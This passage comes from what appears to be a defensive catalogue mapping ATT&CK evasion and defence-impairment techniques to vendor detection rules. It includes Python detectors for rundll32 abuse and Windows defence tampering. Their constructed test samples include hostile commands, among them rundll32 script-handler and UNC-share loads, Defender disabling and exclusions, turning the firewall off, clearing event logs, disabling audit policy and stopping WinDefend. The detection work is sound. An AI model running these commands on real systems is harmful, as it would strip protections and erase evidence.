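    """Split a Windows command line on whitespace, honouring double quotes (quotes dropped)."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens

def parse_rundll32(cmdline):
    """Return (module, entry), lower-cased, as rundll32 reads 'dll,entry' or 'dll entry'."""
    args = tokenize(cmdline)[1:]  # drop the program token itself
    if not args:
        return "", ""
    head = args[0]
    if "," in head:
        module, _, entry = head.partition(",")
        if not entry and len(args) > 1:  # 'dll, entry' with a space after the comma
            entry = args[1]
    else:
        module, entry = head, (args[1] if len(args) > 1 else "")
    return module.lower(), entry.lower()

def evaluate(ev):
    """Return the predicate names that fire for one process-creation event."""
    base = ntpath.basename(ev.image).lower()
    if base != "rundll32.exe" and ev.original_file_name.lower() != "rundll32.exe":
        return []
    hits = ["renamed_rundll32"] if base != "rundll32.exe" else []
    module, entry = parse_rundll32(ev.command_line)
    if not module:
        hits.append("no_dll_in_command_line")
    elif module.startswith(("javascript:", "vbscript:")):
        hits.append("script_protocol_handler")  # e.g. javascript:"\..\mshtml,RunHTMLApplication"
    else:
        if ntpath.splitext(module)[1] not in ("",) + COMMON_EXTENSIONS:
            hits.append("uncommon_dll_extension")
        if module.startswith("\\\\"):
            hits.append("unc_path_module")
        elif "\\" in module:  # bare names resolve via DLL search order; judge explicit paths only
            if any(d in module for d in WRITABLE_DIRS):
                hits.append("dll_in_world_writable_directory")
            elif not module.startswith(STANDARD_DLL_DIRS):
                hits.append("dll_from_nonstandard_directory")
        if re.fullmatch(r"#\d+", entry):
            hits.append("export_called_by_ordinal")
    if ntpath.basename(ev.parent_image).lower() in SUSPICIOUS_PARENTS:
        hits.append("suspicious_parent_process")
    return hits

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe shell32.dll,Control_RunDLL "C:\Windows\System32\desk.cpl"',
                 r"C:\Windows\explorer.exe", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", "rundll32.exe",
                 r"C:\Windows\System32\svchost.exe", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\update.dat,#1",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe \\10.0.0.5\share\loader.dll,Start",
                 r"C:\Windows\System32\cmd.exe", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
                 r"C:\Windows\System32\cmd.exe", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Users\Public\svchost.exe", r"svchost.exe C:\Users\Public\a.dll,Go",
                 r"C:\Windows\System32\cmd.exe", "RUNDLL32.EXE"),
]
```

Running evaluate() over SAMPLE_EVENTS yields nothing for the first (explorer launching the Desk control panel), one predicate each for the bare rundll32.exe, the UNC module and the javascript: handler, four predicates for the Word-spawned .dat module called by ordinal from C:\Users\Public, and a renamed-binary hit for the last event, which is only recognised as rundll32 because the OriginalFileName field survives the rename. Note that the tokenizer matters: quoted paths with spaces and a comma-separated entry point are handled as one module spec, which is where naive whitespace splitting of Sigma-style contains-matching goes wrong.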
System Binary Proxy Execution: Verclsid T1218.012 1 rule
- Splunk Verclsid CLSID Execution production
System Binary Proxy Execution: Mavinject T1218.013 3 rules
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Renamed Mavinject.EXE Execution test
- Splunk Windows Binary Proxy Execution Mavinject DLL Injection production
System Binary Proxy Execution: MMC T1218.014 22 rules
- Splunk .msc Executed from Unusual Location (Sysmon)
- Splunk .msc Executed from Unusual Location (Windows Event Log)
- Splunk Group Policy Editor Execution (PowerShell)
- Splunk Group Policy Editor Execution (Sysmon)
- Splunk Group Policy Editor Execution (Windows Event Log)
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Mmc LOLBAS Execution Process Spawn production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Kusto Process Injection Initiated By MMC
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Splunk Suspicious Execution via Microsoft Common Console (Sysmon)
- Splunk Suspicious Execution via Microsoft Common Console (Windows Event Log)
- Kusto Suspicious MSC File Launched
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows Execution of Microsoft MSC File In Suspicious Path production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows Mock Trusted Directory MSC File Creation production
XSL Script Processing T1220 14 rules
- Elastic Delayed Execution via Ping production
- Splunk Msxsl Execution (EDR)
- Splunk Msxsl Execution (Sysmon)
- Splunk Msxsl Execution (Windows Event Log)
- Sigma Msxsl.EXE Execution test
- Elastic Network Connection via MsXsl production
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Remote XSL Execution Via Msxsl.EXE test
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma WMIC Loading Scripting Libraries test
- Splunk WMIC XSL Execution via URL production
- Sigma XSL Script Execution Via WMIC.EXE test
- Splunk XSL Script Execution With WMIC production
Template Injection T1221 1 rule
Virtualization/Sandbox Evasion T1497 14 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Splunk Headless Browser Usage production
- Splunk Ping Sleep Batch Command production
- Sigma Powershell Detect Virtualization Environment test
- Splunk Windows Chromium Browser Launched with Small Window Size production
- Splunk Windows Chromium Browser No Security Sandbox Process production
- Splunk Windows Chromium Browser with Custom User Data Directory production
- Splunk Windows Chromium process Launched with Disable Popup Blocking production
- Splunk Windows Chromium Process Launched with Logging Disabled production
- Splunk Windows Chromium Process with Disabled Extensions production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Virtualization/Sandbox Evasion: Time Based Checks T1497.003 4 rules
- Elastic Delayed Execution via Ping production
- Splunk Ping Sleep Batch Command production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Pre-OS Boot T1542 8 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WinLogon with Public Network Connection production
Pre-OS Boot: System Firmware T1542.001 3 rules
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows Suspicious File in EFI Volume production
Pre-OS Boot: Bootkit T1542.003 3 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows WinLogon with Public Network Connection production
Impair Defenses T1562 92 rules
- Sigma Audit policy disabled by command line experimental
- Sigma Audit policy disabled by command line experimental
- Elastic Clearing Windows Event Logs production
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Kusto Detect Windows Allow Firewall Rule Addition/Modification available
- Kusto Detect Windows Update Disabled from Registry available
- Kusto Dev-0270 Malicious Powershell usage available
- Kusto Disable or Modify Windows Defender available
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Elastic Disable Windows Firewall Rules via Netsh production
- Elastic Disabling Lsa Protection via Registry Modification production
- Kusto Disabling Security Services via Registry available
- Elastic Disabling User Account Control via Registry Modification production
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Elastic DNS Global Query Block List Modified or Disabled production
- Elastic DNS-over-HTTPS Enabled via Registry production
- Kusto Doppelpaymer Stop Services available
- Elastic Enable Host Network Discovery via Netsh production
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Sigma Event log deactivation or size reduction (command) experimental
- Sigma Firewall deactivation (deprecated command) experimental
- Sigma Firewall deactivation (firewall) experimental
- Sigma Firewall deactivation (modern command) experimental
- Sigma Firewall deactivation (PowerShell) experimental
- Sigma Firewall rule added using PowerShell or CMD experimental
- Sigma Firewall rule any/any created experimental
- Sigma Firewall rule creation (command) experimental
- Elastic IIS HTTP Logging Disabled production
- Kusto Imminent Ransomware available
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic Local Account TokenFilter Policy Disabled production
- Sigma Microsoft Defender critical security components disabled (command) experimental
- Sigma Microsoft Defender critical security components disabled (PowerShell) experimental
- Sigma Microsoft Defender default action changed to allow any threat (command) experimental
- Sigma Microsoft Defender default action changed to allow any threat (PowerShell) experimental
- Sigma Microsoft Defender real time protection failure (native) experimental
- Sigma Microsoft Defender security components disabled (command) experimental
- Sigma Microsoft Defender security components disabled (PowerShell) experimental
- Sigma Microsoft Defender service components status disabled (Registry via Sysmon) experimental
- Sigma Microsoft Defender service deactivation attempt (command) experimental
- Sigma Microsoft Defender threat exclusion added (native) experimental
- Sigma Microsoft Defender threat exclusion added (PowerShell) experimental
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Splunk Modify Windows Defender (EDR)
- Splunk Modify Windows Defender (PowerShell)
- Splunk Modify Windows Defender (Sysmon)
- Splunk Modify Windows Defender (Windows Event Log)
- Kusto MosaicLoader available
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma NTLM downgrade attack (Reg via SYSMON) experimental
- Sigma OCSP responder auditing settings changed or disabled experimental
- Sigma OpenSSH server firewall configuration on Windows (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (firewall) experimental
- Sigma OpenSSH server firewall configuration on Windows (PowerShell) experimental
- Elastic Potential Evasion via Filter Manager production
- Elastic Potential Evasion via Windows Filtering Platform production
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Elastic Potential RemoteMonologue Attack production
- Elastic PowerShell Script Block Logging Disabled production
- YARA-L Reg Add Suspicious Paths
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Kusto Scheduled Task Hide available
- Elastic Scheduled Tasks AT Command Enabled production
- Kusto Security Service Registry ACL Modification
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Starting or Stopping HealthService to Avoid Detection available
- Kusto Stopping multiple processes using taskkill available
- Sigma Wdigest authentication enabled (Reg via command) experimental
- Sigma Wdigest authentication enabled (registry) experimental
- Splunk WFP Blocked Connection from EDR Agent (Windows Event Log)
- Splunk WFP Filter and Provider Changed (Windows Event Log)
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Defender Disabled Detection (EDR)
- Splunk Windows Defender Disabled Detection (PowerShell)
- Splunk Windows Defender Disabled Detection (Sysmon)
- Splunk Windows Defender Disabled Detection (Windows Event Log)
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
- Splunk Windows Firewall Disabled (PowerShell)
- Splunk Windows Firewall Disabled (Sysmon)
- Splunk Windows Firewall Disabled (Windows Event Log)
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Firewall Rule Creation (PowerShell)
- Splunk Windows Firewall Rule Creation (Windows Event Log)
Impair Defenses: Disable or Modify Tools T1562.001 42 rules
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Kusto Disable or Modify Windows Defender available
- Elastic Disabling Lsa Protection via Registry Modification production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma Microsoft Defender critical security components disabled (command) experimental
- Sigma Microsoft Defender critical security components disabled (PowerShell) experimental
- Sigma Microsoft Defender default action changed to allow any threat (command) experimental
- Sigma Microsoft Defender default action changed to allow any threat (PowerShell) experimental
- Sigma Microsoft Defender real time protection failure (native) experimental
- Sigma Microsoft Defender security components disabled (command) experimental
- Sigma Microsoft Defender security components disabled (PowerShell) experimental
- Sigma Microsoft Defender service components status disabled (Registry via Sysmon) experimental
- Sigma Microsoft Defender service deactivation attempt (command) experimental
- Sigma Microsoft Defender threat exclusion added (native) experimental
- Sigma Microsoft Defender threat exclusion added (PowerShell) experimental
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Splunk Modify Windows Defender (EDR)
- Splunk Modify Windows Defender (PowerShell)
- Splunk Modify Windows Defender (Sysmon)
- Splunk Modify Windows Defender (Windows Event Log)
- Elastic Potential Evasion via Filter Manager production
- Elastic Potential Evasion via Windows Filtering Platform production
- YARA-L Reg Add Suspicious Paths
- Elastic Scheduled Tasks AT Command Enabled production
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Starting or Stopping HealthService to Avoid Detection available
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Defender Disabled Detection (EDR)
- Splunk Windows Defender Disabled Detection (PowerShell)
- Splunk Windows Defender Disabled Detection (Sysmon)
- Splunk Windows Defender Disabled Detection (Windows Event Log)
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
Impair Defenses: Disable Windows Event Logging T1562.002 9 rules
- Sigma Audit policy disabled by command line experimental
- Sigma Audit policy disabled by command line experimental
- Elastic Clearing Windows Event Logs production
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma Event log deactivation or size reduction (command) experimental
- Elastic IIS HTTP Logging Disabled production
- Sigma OCSP responder auditing settings changed or disabled experimental
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Sensitive Audit Policy Sub-Category Disabled production
Impair Defenses: Disable or Modify System Firewall T1562.004 20 rules
- Elastic Disable Windows Firewall Rules via Netsh production
- Elastic Enable Host Network Discovery via Netsh production
- Sigma Firewall deactivation (deprecated command) experimental
- Sigma Firewall deactivation (firewall) experimental
- Sigma Firewall deactivation (modern command) experimental
- Sigma Firewall deactivation (PowerShell) experimental
- Sigma Firewall rule added using PowerShell or CMD experimental
- Sigma Firewall rule any/any created experimental
- Sigma Firewall rule creation (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (firewall) experimental
- Sigma OpenSSH server firewall configuration on Windows (PowerShell) experimental
- Elastic Potential Evasion via Windows Filtering Platform production
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Windows Firewall Disabled (PowerShell)
- Splunk Windows Firewall Disabled (Sysmon)
- Splunk Windows Firewall Disabled (Windows Event Log)
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Firewall Rule Creation (PowerShell)
- Splunk Windows Firewall Rule Creation (Windows Event Log)
Impair Defenses: Indicator Blocking T1562.006 5 rules
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
Impair Defenses: Downgrade Attack T1562.010 3 rules
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma NTLM downgrade attack (Reg via SYSMON) experimental
- Elastic Potential NetNTLMv1 Downgrade Attack production
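The Impair Defenses rules above are mostly command-line predicates over a few tools: Set-MpPreference and Add-MpPreference for Defender, netsh (both the deprecated `firewall` and the current `advfirewall` context) and Set-NetFirewallProfile for the host firewall, reg.exe for the Defender policy keys, auditpol and wevtutil for logging, and sc/net/Stop-Service for security services. Several of them exist in both a "(command)" and a "(PowerShell)" variant for a reason: a process-creation event only shows `powershell -enc <base64>`, so the same Set-MpPreference call is invisible to a command-line regex unless the encoded payload is decoded. The Python below is an added example, not any vendor's rule, that applies regex predicates to constructed command lines and also decodes a -EncodedCommand argument before matching. The patterns, predicate names and sample lines are this editor's assumptions and approximate what the titles describe.

```python
"""Added example: approximate Impair Defenses (T1562) command-line predicates,
including a look inside PowerShell -EncodedCommand payloads. The patterns are this
editor's reading of what the rule titles above describe, not the vendors' rule
bodies; the command lines at the bottom are constructed."""
import base64
import binascii
import re

# (predicate name, pattern over a lower-cased, quote-stripped, whitespace-collapsed command line).
# PowerShell accepts any unambiguous parameter prefix and documented aliases such as -drtm
# for -DisableRealtimeMonitoring, so the Defender patterns match a prefix, not the full name.
RULES = [
    ("defender_component_disabled",
     re.compile(r"set-mppreference\b.*-(?:disable\w*|drtm)[\s:]+(?:\$true|1)\b")),
    ("defender_exclusion_added", re.compile(r"(?:add|set)-mppreference\b.*-exclusion\w*\b")),
    ("defender_disabled_via_registry", re.compile(
        r"(?:reg(?:\.exe)? add|set-itemproperty|new-itemproperty).*windows defender.*disableanti(?:spyware|virus).*\b1\b")),
    ("firewall_disabled_modern", re.compile(r"netsh(?:\.exe)? advfirewall set \w+ state off")),
    ("firewall_disabled_deprecated", re.compile(r"netsh(?:\.exe)? firewall set opmode (?:mode=)?disable")),
    ("firewall_disabled_powershell", re.compile(r"set-netfirewallprofile\b.*-enabled[\s:]+(?:\$?false|0)\b")),
    ("firewall_allow_rule_added", re.compile(r"netsh(?:\.exe)? advfirewall firewall add rule\b.*action=allow")),
    ("audit_policy_disabled", re.compile(
        r"auditpol(?:\.exe)? (?:/clear|/remove|/set\b.*(?:/success:disable|/failure:disable))")),
    ("event_log_cleared_or_reconfigured", re.compile(r"wevtutil(?:\.exe)? (?:cl|clear-log|sl|set-log)\b")),
    ("security_service_stopped", re.compile(
        r"(?:sc(?:\.exe)? (?:stop|config|delete)|net1?(?:\.exe)? stop|stop-service)\b.*\b(?:windefend|sense|wdnissvc|mpssvc|eventlog|healthservice)\b")),
]

def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so one pattern covers the common spellings."""
    return " ".join(cmdline.replace('"', "").replace("'", "").split()).lower()

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind a powershell -EncodedCommand argument, or None.
    Works on the raw line: base64 is case-sensitive, so decode before lower-casing."""
    tokens = cmdline.replace('"', "").split()
    for i, tok in enumerate(tokens[:-1]):
        alias = tok[1:].lower() if tok.startswith("-") else ""
        # powershell.exe accepts -e, -ec and any prefix of -EncodedCommand
        if alias and (alias == "ec" or "encodedcommand".startswith(alias)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None

def detect(cmdline):
    """Sorted predicate names for one command line, also matched against any decoded payload."""
    texts, hits = [normalize(cmdline)], set()
    payload = decode_encoded_command(cmdline)
    if payload is not None:
        hits.add("encoded_powershell_command")
        texts.append(normalize(payload))
    for text in texts:
        hits.update(name for name, rx in RULES if rx.search(text))
    return sorted(hits)

def b64_utf16(script):
    """Encode a script the way powershell -EncodedCommand expects (used to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed command lines, not real telemetry.
SAMPLES = [
    r'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\Users\Public"',
    "powershell.exe -nop -w hidden -enc " + b64_utf16("Set-MpPreference -drtm 1"),
    "netsh advfirewall set allprofiles state off",
    "netsh firewall set opmode disable",
    'auditpol /set /subcategory:"Process Creation" /success:disable /failure:disable',
    "wevtutil cl Security",
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    "sc stop WinDefend",
    "netsh advfirewall show allprofiles",  # benign: read-only
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{line[:70]:72} -> {detect(line)}")
```

The second sample is the one that separates the two rule variants: the raw command line contains nothing a Defender pattern can match, and only the decoded payload reveals `Set-MpPreference -drtm 1`. Script block logging (Event ID 4104) gives you that text without decoding, which is why the "(PowerShell)" variants above are worth deploying alongside the process-creation ones.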
Hide Artifacts T1564 96 rules
- Elastic Adding Hidden File Attribute via Attrib production
- Elastic Alternate Data Stream Creation/Execution at Volume Root Directory production
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Attrib.exe Metasploit File Dropper (EDR)
- Splunk Attrib.exe Metasploit File Dropper (Sysmon)
- Splunk Attrib.exe Metasploit File Dropper (Windows Event Log)
- Sigma Browser Execution In Headless Mode test
- Sigma Cmd Launched with Hidden Start Flags to Suspicious Targets experimental
- Sigma CrashControl CrashDump Disabled test
- Elastic Creation of a Hidden Local User Account production
- Sigma Detection of default a Windows host name in login attempts experimental
- Splunk Disable Show Hidden Files production
- Sigma Displaying Hidden Files Feature Disabled test
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Execute From Alternate Data Streams test
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma Exports Registry Key To an Alternate Data Stream test
- Sigma Extended rights backdoor obfuscation (via localizationDisplayId attribute) experimental
- Kusto Fake computer account created
- Sigma File Download with Headless Browser test
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool Named File Stream Created test
- Splunk Headless Browser Mockbin or Mocky Request production
- Splunk Headless Browser Usage production
- Sigma Hidden Executable In NTFS Alternate Data Stream test
- Splunk Hidden User Created - Windows (Sysmon)
- Splunk Hidden User Created - Windows (Windows Event Log)
- Sigma Hiding Files with Attrib.exe test
- Sigma Hiding User Account Via SpecialAccounts Registry Key test
- Sigma Hiding User Account Via SpecialAccounts Registry Key - CommandLine test
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Kusto Malware in the recycle bin available
- Kusto Malware in the recycle bin (Normalized Process Events)
- Sigma NTFS Alternate Data Stream test
- Splunk Parent in Public Folder Suspicious Process (Sysmon)
- Splunk Parent in Public Folder Suspicious Process (Windows Event Log)
- Elastic Persistence via Hidden Run Key Detected production
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI test
- Sigma Potential Rundll32 Execution With DLL Stored In ADS test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potentially Suspicious Execution From Parent Process In Public Folder test
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Sigma Powershell Store File In Alternate Data Stream test
- Sigma PrintBrm ZIP Creation of Extraction test
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Execution test
- Sigma Registry Persistence via Service in Safe Mode test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Run PowerShell Script from ADS test
- Elastic Service DACL Modification via sc.exe production
- Sigma Set Files as System Files Using Attrib.EXE test
- Sigma Set Suspicious Files as System Files Using Attrib.EXE test
- Sigma Suspicious Creation with Colorcpl test
- Sigma Suspicious Diantz Alternate Data Stream Execution test
- Sigma Suspicious Executable File Creation test
- Sigma Suspicious Extrac32 Alternate Data Stream Execution test
- Sigma Suspicious File Download From File Sharing Websites - File Stream test
- Sigma Suspicious Hyper-V Cmdlets test
- Sigma Suspicious PowerShell WindowStyle Option test
- Sigma Sysmon Configuration Error test
- Sigma Sysmon Configuration Modification test
- Elastic Unusual File Creation - Alternate Data Stream production
- Sigma Unusual File Download from Direct IP Address test
- Sigma Unusual File Download From File Sharing Websites - File Stream test
- Elastic Unusual Process Execution Path - Alternate Data Stream production
- Sigma Use Icacls to Hide File to Everyone test
- Sigma Use NTFS Short Name in Command Line test
- Sigma Use NTFS Short Name in Image test
- Sigma Use Short Name Path in Command Line test
- Sigma Use Short Name Path in Image test
- Sigma Virtualbox Driver Installation or Starting of VMs test
- Splunk Windows Alternate DataStream - Base64 Content production
- Splunk Windows Alternate DataStream - Executable Content production
- Splunk Windows Alternate DataStream - Process Execution production
- Splunk Windows ConHost with Headless Argument production
- Splunk Windows New Deny Permission Set On Service SD Via Sc.EXE production
- Splunk Windows New Service Security Descriptor Set Via Sc.EXE production
- Elastic Windows Sandbox with Sensitive Configuration production
- Sigma Windows Subsystem for Linux (WSL) installation (command) experimental
- Sigma Windows Subsystem for Linux (WSL) installation (PowerShell) experimental
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
Hide Artifacts: Hidden Files and Directories T1564.001 11 rules
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Disable Show Hidden Files production
- Sigma Displaying Hidden Files Feature Disabled test
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Hiding Files with Attrib.exe test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Sigma Registry Persistence via Service in Safe Mode test
- Sigma Set Files as System Files Using Attrib.EXE test
- Sigma Set Suspicious Files as System Files Using Attrib.EXE test
- Sigma Use Icacls to Hide File to Everyone test
Hide Artifacts: Hidden Users T1564.002 6 rules
- Elastic Creation of a Hidden Local User Account production
- Splunk Hidden User Created - Windows (Sysmon)
- Splunk Hidden User Created - Windows (Windows Event Log)
- Sigma Hiding User Account Via SpecialAccounts Registry Key test
- Sigma Hiding User Account Via SpecialAccounts Registry Key - CommandLine test
- Sigma Potential Suspicious Activity Using SeCEdit test
Hide Artifacts: Hidden Window T1564.003 13 rules
- Sigma Browser Execution In Headless Mode test
- Sigma Cmd Launched with Hidden Start Flags to Suspicious Targets experimental
- Sigma File Download with Headless Browser test
- Sigma HackTool - Covenant PowerShell Launcher test
- Splunk Headless Browser Mockbin or Mocky Request production
- Splunk Headless Browser Usage production
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Sigma PUA - AdvancedRun Execution test
- Sigma Suspicious PowerShell WindowStyle Option test
- Splunk Windows ConHost with Headless Argument production
Hide Artifacts: NTFS File Attributes T1564.004 33 rules
- Elastic Alternate Data Stream Creation/Execution at Volume Root Directory production
- Sigma Execute From Alternate Data Streams test
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma Exports Registry Key To an Alternate Data Stream test
- Sigma HackTool Named File Stream Created test
- Sigma Hidden Executable In NTFS Alternate Data Stream test
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Sigma NTFS Alternate Data Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI test
- Sigma Potential Rundll32 Execution With DLL Stored In ADS test
- Sigma Powershell Store File In Alternate Data Stream test
- Sigma PrintBrm ZIP Creation of Extraction test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Run PowerShell Script from ADS test
- Sigma Suspicious Diantz Alternate Data Stream Execution test
- Sigma Suspicious Extrac32 Alternate Data Stream Execution test
- Sigma Suspicious File Download From File Sharing Websites - File Stream test
- Elastic Unusual File Creation - Alternate Data Stream production
- Sigma Unusual File Download from Direct IP Address test
- Sigma Unusual File Download From File Sharing Websites - File Stream test
- Elastic Unusual Process Execution Path - Alternate Data Stream production
- Sigma Use NTFS Short Name in Command Line test
- Sigma Use NTFS Short Name in Image test
- Sigma Use Short Name Path in Command Line test
- Sigma Use Short Name Path in Image test
- Splunk Windows Alternate DataStream - Base64 Content production
- Splunk Windows Alternate DataStream - Executable Content production
- Splunk Windows Alternate DataStream - Process Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
Hide Artifacts: Run Virtual Instance T1564.006 8 rules
- Sigma Detection of default a Windows host name in login attempts experimental
- Sigma Suspicious Hyper-V Cmdlets test
- Sigma Virtualbox Driver Installation or Starting of VMs test
- Splunk Windows ConHost with Headless Argument production
- Elastic Windows Sandbox with Sensitive Configuration production
- Sigma Windows Subsystem for Linux (WSL) installation (command) experimental
- Sigma Windows Subsystem for Linux (WSL) installation (PowerShell) experimental
- Splunk Windows Suspicious QEMU Execution production
Hide Artifacts: Email Hiding Rules T1564.008 2 rules
